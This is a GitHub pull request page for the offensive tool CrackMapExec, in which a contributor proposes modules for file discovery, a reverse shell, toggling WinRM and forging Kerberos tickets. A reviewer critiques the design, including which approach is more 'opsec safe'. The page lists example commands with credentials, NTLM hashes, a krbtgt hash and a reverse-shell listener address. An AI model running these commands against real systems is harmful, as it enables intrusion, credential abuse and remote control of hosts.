Skip to content
This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

modules for cme #705

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

modules for cme #705

wants to merge 5 commits into from

Conversation

e1abrador
Copy link

@e1abrador e1abrador commented Dec 24, 2022

Modules pushed:

file_discovery:

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M file_discovery -o SEARCH_PATH=C:\\Users

revshell:

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M reverse_shell -o LHOST=192.168.163.136 LPORT=1234 HTTP_SERVER=8443

winrm

crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=ENABLE
crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=DISABLE

gettgt

crackmapexec smb 192.168.246.139 -u Administrador -H 2b576acbe6bcfda7294d6bd18041b8fe -M gettgt -o KRBTGT_NTLM=70a415ccf57e2a3c781764a3b1beee95 TARGET_USER=domain_user

@e1abrador e1abrador changed the title file_discovery cme module modules for cme Mar 31, 2023
@ILightThings
Copy link
Contributor

Although the ambition is great, I don't think gettgt is done in a very efficient way.

From what I can read, you are checking to see if impacket is installed. If it is not installed, then you download impact repo to /opt/impacket and run the setup.py script to install impacket. And then you use a sub-process to run ticketer.py to request a ticket.

3f9f0e4#diff-7d45a018c200c99099fee9a07a3e87a1021598d8a56220be40b18eeec7dbe500R38

Although that would make a great shell script, crackmapexec is built around impacket. So it would likely already be installed. What you could try doing, is reading the ticketed script and re-implement it into an impacket module, similar to how this pull request was done.

b2eb3b7.

But running this module could actively break crackmapexec under the right circumstances.

@ILightThings
Copy link
Contributor

Regarding WinRM.py , RevShell.py, and File_discovery, from the looks of it, you are logging in and using powershell to run these commands. Although this might be ideal from RevShell.py, using the remote services manager (\pipe\svcctl) to enable\disable services (like winrm) would be more opsec safe. This is also how SMBexec and Psexec work. See https://github.com/fortra/impacket/blob/master/examples/psexec.py

File_Discovery is also interfacing with powershell, but we do have spider_plus and spider to do file lookups.

I am not the developer or main contributor to CME, so my word doesn't mean a lot, but I would check out some of the other modules to grow and expand on these.

Hope this helps.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants